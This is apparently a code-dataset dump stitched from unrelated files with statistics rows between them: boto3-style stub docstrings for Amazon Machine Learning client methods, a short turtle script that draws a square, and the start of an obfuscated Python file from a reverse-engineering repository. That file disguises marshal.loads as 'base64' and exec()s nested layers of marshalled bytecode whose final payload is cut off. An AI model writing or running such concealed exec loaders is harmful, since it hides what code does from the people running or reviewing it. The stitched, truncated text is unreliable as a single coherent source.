COMPLETED - The evaluation process completed successfully.
DELETED - The Evaluation is marked as deleted. It is not usable.
"""
pass
def describe_ml_models(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of MLModel objects that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_ml_models(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'IAMUser'|'TrainingDataSourceId'|'RealtimeEndpointStatus'|'MLModelType'|'Algorithm'|'TrainingDataURI',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of MLModel :
CreatedAt - Sets the search criteria to MLModel creation date.
Status - Sets the search criteria to MLModel status.
Name - Sets the search criteria to the contents of MLModel Name .
IAMUser - Sets the search criteria to the user account that invoked the MLModel creation.
TrainingDataSourceId - Sets the search criteria to the DataSource used to train one or more MLModel .
RealtimeEndpointStatus - Sets the search criteria to the MLModel real-time endpoint status.
MLModelType - Sets the search criteria to MLModel type: binary, regression, or multi-class.
Algorithm - Sets the search criteria to the algorithm that the MLModel uses.
TrainingDataURI - Sets the search criteria to the data file(s) used in training an MLModel . The URL can identify either a file or an Amazon Simple Storage Service (Amazon S3) bucket or directory.
:type EQ: string
:param EQ: The equal to operator. The MLModel results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The MLModel results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The MLModel results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The MLModel results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The MLModel results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The MLModel results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, an MLModel could have the Name 2014-09-09-HolidayGiftMailer . To search for this MLModel , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of MLModel .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: The ID of the page in the paginated results.
:type Limit: integer
:param Limit: The maximum number of MLModel results to include in the result. The range of acceptable values is 1 through 100 . The default value is 100 .
:rtype: dict
:return: {
'Results': [
{
'MLModelId': 'string',
'TrainingDataSourceId': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'SizeInBytes': 123,
'EndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
},
'TrainingParameters': {
'string': 'string'
},
'InputDataLocationS3': 'string',
'Algorithm': 'sgd',
'MLModelType': 'REGRESSION'|'BINARY'|'MULTICLASS',
'ScoreThreshold': ...,
'ScoreThresholdLastUpdatedAt': datetime(2015, 1, 1),
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to create an MLModel .
INPROGRESS - The creation process is underway.
FAILED - The request to create an MLModel didn't run to completion. The model isn't usable.
COMPLETED - The creation process completed successfully.
DELETED - The MLModel is marked as deleted. It isn't usable.
"""
pass
def describe_tags(ResourceId=None, ResourceType=None):
"""
Describes one or more of the tags for your Amazon ML object.
See also: AWS API Documentation
:example: response = client.describe_tags(
ResourceId='string',
ResourceType='BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
)
:type ResourceId: string
:param ResourceId: [REQUIRED]
The ID of the ML object. For example, exampleModelId .
:type ResourceType: string
:param ResourceType: [REQUIRED]
The type of the ML object.
:rtype: dict
:return: {
'ResourceId': 'string',
'ResourceType': 'BatchPrediction'|'DataSource'|'Evaluation'|'MLModel',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned URL given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_batch_prediction(BatchPredictionId=None):
"""
Returns a BatchPrediction that includes detailed metadata, status, and data file information for a Batch Prediction request.
See also: AWS API Documentation
:example: response = client.get_batch_prediction(
BatchPredictionId='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
An ID assigned to the BatchPrediction at creation.
:rtype: dict
:return: {
'BatchPredictionId': 'string',
'MLModelId': 'string',
'BatchPredictionDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'OutputUri': 'string',
'LogUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'TotalRecordCount': 123,
'InvalidRecordCount': 123
}
"""
pass
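The TotalRecordCount and InvalidRecordCount fields returned above let you judge how much of the input Amazon ML could actually score. A small helper sketch (the function name is illustrative, not part of the API):

```python
def invalid_record_fraction(batch_prediction):
    """Fraction of input records that were invalid, from a GetBatchPrediction
    response dict. Returns 0.0 when the counts are absent (e.g. still PENDING)."""
    total = batch_prediction.get('TotalRecordCount') or 0
    invalid = batch_prediction.get('InvalidRecordCount') or 0
    return invalid / total if total else 0.0
```

A high fraction usually points at schema mismatches between the scoring DataSource and the data the MLModel was trained on.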
def get_data_source(DataSourceId=None, Verbose=None):
"""
Returns a DataSource that includes metadata and data file information, as well as the current status of the DataSource .
GetDataSource provides results in normal or verbose format. The verbose format adds the schema description and the list of files pointed to by the DataSource to the normal format.
See also: AWS API Documentation
:example: response = client.get_data_source(
DataSourceId='string',
Verbose=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
The ID assigned to the DataSource at creation.
:type Verbose: boolean
:param Verbose: Specifies whether the GetDataSource operation should return DataSourceSchema .
If true, DataSourceSchema is returned.
If false, DataSourceSchema is not returned.
:rtype: dict
:return: {
'DataSourceId': 'string',
'DataLocationS3': 'string',
'DataRearrangement': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'DataSizeInBytes': 123,
'NumberOfFiles': 123,
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'LogUri': 'string',
'Message': 'string',
'RedshiftMetadata': {
'RedshiftDatabase': {
'DatabaseName': 'string',
'ClusterIdentifier': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string'
},
'RDSMetadata': {
'Database': {
'InstanceIdentifier': 'string',
'DatabaseName': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string',
'ResourceRole': 'string',
'ServiceRole': 'string',
'DataPipelineId': 'string'
},
'RoleARN': 'string',
'ComputeStatistics': True|False,
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'DataSourceSchema': 'string'
}
:returns:
PENDING - Amazon ML submitted a request to create a DataSource .
INPROGRESS - The creation process is underway.
FAILED - The request to create a DataSource did not run to completion. It is not usable.
COMPLETED - The creation process completed successfully.
DELETED - The DataSource is marked as deleted. It is not usable.
"""
pass
def get_evaluation(EvaluationId=None):
"""
Returns an Evaluation that includes metadata as well as the current status of the Evaluation .
See also: AWS API Documentation
:example: response = client.get_evaluation(
EvaluationId='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
The ID of the Evaluation to retrieve. The evaluation of each MLModel is recorded and cataloged. The ID provides the means to access the information.
:rtype: dict
:return: {
'EvaluationId': 'string',
'MLModelId': 'string',
'EvaluationDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'PerformanceMetrics': {
'Properties': {
'string': 'string'
}
},
'LogUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
}
:returns:
BinaryAUC: A binary MLModel uses the Area Under the Curve (AUC) technique to measure performance.
RegressionRMSE: A regression MLModel uses the Root Mean Square Error (RMSE) technique to measure performance. RMSE measures the difference between predicted and actual values for a single variable.
MulticlassAvgFScore: A multiclass MLModel uses the F1 score technique to measure performance.
"""
pass
def get_ml_model(MLModelId=None, Verbose=None):
"""
Returns an MLModel that includes detailed metadata, data source information, and the current status of the MLModel .
GetMLModel provides results in normal or verbose format.
See also: AWS API Documentation
:example: response = client.get_ml_model(
MLModelId='string',
Verbose=True|False
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel at creation.
:type Verbose: boolean
:param Verbose: Specifies whether the GetMLModel operation should return Recipe .
If true, Recipe is returned.
If false, Recipe is not returned.
:rtype: dict
:return: {
'MLModelId': 'string',
'TrainingDataSourceId': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'SizeInBytes': 123,
'EndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
},
'TrainingParameters': {
'string': 'string'
},
'InputDataLocationS3': 'string',
'MLModelType': 'REGRESSION'|'BINARY'|'MULTICLASS',
'ScoreThreshold': ...,
'ScoreThresholdLastUpdatedAt': datetime(2015, 1, 1),
'LogUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'Recipe': 'string',
'Schema': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to describe an MLModel .
INPROGRESS - The request is processing.
FAILED - The request did not run to completion. The ML model isn't usable.
COMPLETED - The request completed successfully.
DELETED - The MLModel is marked as deleted. It isn't usable.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def predict(MLModelId=None, Record=None, PredictEndpoint=None):
"""
Generates a prediction for the observation using the specified MLModel .
See also: AWS API Documentation
:example: response = client.predict(
MLModelId='string',
Record={
'string': 'string'
},
PredictEndpoint='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
A unique identifier of the MLModel .
:type Record: dict
:param Record: [REQUIRED]
A map of variable name-value pairs that represent an observation.
(string) --The name of a variable. Currently it's used to specify the name of the target value, label, weight, and tags.
(string) --The value of a variable. Currently it's used to specify values of the target value, weights, and tag variables and for filtering variable values.
:type PredictEndpoint: string
:param PredictEndpoint: [REQUIRED]
:rtype: dict
:return: {
'Prediction': {
'predictedLabel': 'string',
'predictedValue': ...,
'predictedScores': {
'string': ...
},
'details': {
'string': 'string'
}
}
}
:returns:
Details - Contains the following attributes: DetailsAttributes.PREDICTIVE_MODEL_TYPE - REGRESSION | BINARY | MULTICLASS DetailsAttributes.ALGORITHM - SGD
PredictedLabel - Present for either a BINARY or MULTICLASS MLModel request.
PredictedScores - Contains the raw classification score corresponding to each label.
PredictedValue - Present for a REGRESSION MLModel request.
"""
pass
def update_batch_prediction(BatchPredictionId=None, BatchPredictionName=None):
"""
Updates the BatchPredictionName of a BatchPrediction .
You can use the GetBatchPrediction operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_batch_prediction(
BatchPredictionId='string',
BatchPredictionName='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
The ID assigned to the BatchPrediction during creation.
:type BatchPredictionName: string
:param BatchPredictionName: [REQUIRED]
A new user-supplied name or description of the BatchPrediction .
:rtype: dict
:return: {
'BatchPredictionId': 'string'
}
"""
pass
def update_data_source(DataSourceId=None, DataSourceName=None):
"""
Updates the DataSourceName of a DataSource .
You can use the GetDataSource operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_data_source(
DataSourceId='string',
DataSourceName='string'
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
The ID assigned to the DataSource during creation.
:type DataSourceName: string
:param DataSourceName: [REQUIRED]
A new user-supplied name or description of the DataSource that will replace the current description.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def update_evaluation(EvaluationId=None, EvaluationName=None):
"""
Updates the EvaluationName of an Evaluation.
You can use the GetEvaluation operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_evaluation(
EvaluationId='string',
EvaluationName='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
The ID assigned to the Evaluation during creation.
:type EvaluationName: string
:param EvaluationName: [REQUIRED]
A new user-supplied name or description of the Evaluation that will replace the current content.
:rtype: dict
:return: {
'EvaluationId': 'string'
}
"""
pass
def update_ml_model(MLModelId=None, MLModelName=None, ScoreThreshold=None):
"""
Updates the MLModelName and the ScoreThreshold of an MLModel.
You can use the GetMLModel operation to view the contents of the updated data element.
See also: AWS API Documentation
:example: response = client.update_ml_model(
MLModelId='string',
MLModelName='string',
ScoreThreshold=...
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel during creation.
:type MLModelName: string
:param MLModelName: A user-supplied name or description of the MLModel.
:type ScoreThreshold: float
:param ScoreThreshold: The ScoreThreshold used in a binary classification MLModel that marks the boundary between a positive prediction and a negative prediction.
Output values greater than or equal to the ScoreThreshold receive a positive result from the MLModel, such as true. Output values less than the ScoreThreshold receive a negative response from the MLModel, such as false.
:rtype: dict
:return: {
'MLModelId': 'string'
}
"""
pass
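The ScoreThreshold rule above can be sketched as a pure function. `classify` is a hypothetical illustration, not an AWS API call: it applies the documented inclusive boundary (scores at or above the threshold are positive).

```python
def classify(raw_score, score_threshold):
    """Map a raw binary-classification score to a label per the ScoreThreshold
    rule: scores >= threshold are positive ('true'), scores below are 'false'."""
    return 'true' if raw_score >= score_threshold else 'false'

print(classify(0.73, 0.5))  # -> 'true'
print(classify(0.5, 0.5))   # -> 'true'  (the boundary itself is positive)
print(classify(0.49, 0.5))  # -> 'false'
```

Raising ScoreThreshold via update_ml_model trades recall for precision: fewer raw scores clear the bar, so fewer records are labeled positive.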
| 51.528037 | 2,142 | 0.675671 | 10,604 | 88,216 | 5.606375 | 0.082045 | 0.010093 | 0.00831 | 0.008949 | 0.771304 | 0.735021 | 0.707771 | 0.676972 | 0.64942 | 0.625248 | 0 | 0.011363 | 0.253798 | 88,216 | 1,711 | 2,143 | 51.558153 | 0.891762 | 0.896447 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
4e03a77e3dae2a36c0c4190d7441253d27583eae | 119 | py | Python | square.py | sonu98513/python | 017414934478970118ad470e44a926514ca45e31 | [
"MIT"
] | null | null | null | square.py | sonu98513/python | 017414934478970118ad470e44a926514ca45e31 | [
"MIT"
] | null | null | null | square.py | sonu98513/python | 017414934478970118ad470e44a926514ca45e31 | [
"MIT"
] | null | null | null | from turtle import *
# Draw a square with 150-pixel sides
for _ in range(4):
    forward(150)
    right(90)
done()
| 11.9 | 21 | 0.680672 | 18 | 119 | 4.5 | 0.444444 | 0.493827 | 0.555556 | 0.62963 | 0.753086 | 0.753086 | 0.753086 | 0.753086 | 0.753086 | 0.753086 | 0 | 0.183673 | 0.176471 | 119 | 9 | 22 | 13.222222 | 0.642857 | 0 | 0 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
9d7d8096bef3e58d235e7e67c977ca5cf1c9f67b | 185,393 | py | Python | anti/main.py | Alpha-Demon404/RE-14 | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 39 | 2020-02-26T09:44:36.000Z | 2022-03-23T00:18:25.000Z | anti/main.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 15 | 2020-05-14T10:07:26.000Z | 2022-01-06T02:55:32.000Z | anti/main.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | #Encrypt by Sumarr ID
import os,sys
from marshal import loads as base64
def asw():
exec(base64('c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x01\xf4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x98\xf2\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns/\xf1\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00
\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xc6\xef\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns]\xee\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xf4\xec\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x8b\xeb\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x
00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns"\xea\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xb9\xe8\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NsP\xe7\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00
Ns\xe7\xe5\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns~\xe4\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x04\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00e\x05\x00\x83\x00\x00\x01d\x01\x00S(\x04\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00loadsc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00B\x00\x00\x00s\x1f\x00\x00\x00e\x00\x00d\x01\x00\x83\x01\x00d\x00\x00\x04Ue\x01\x00j\x02\x00j\x03\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x15\xe3\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s<\x00\x00\x00d\x00\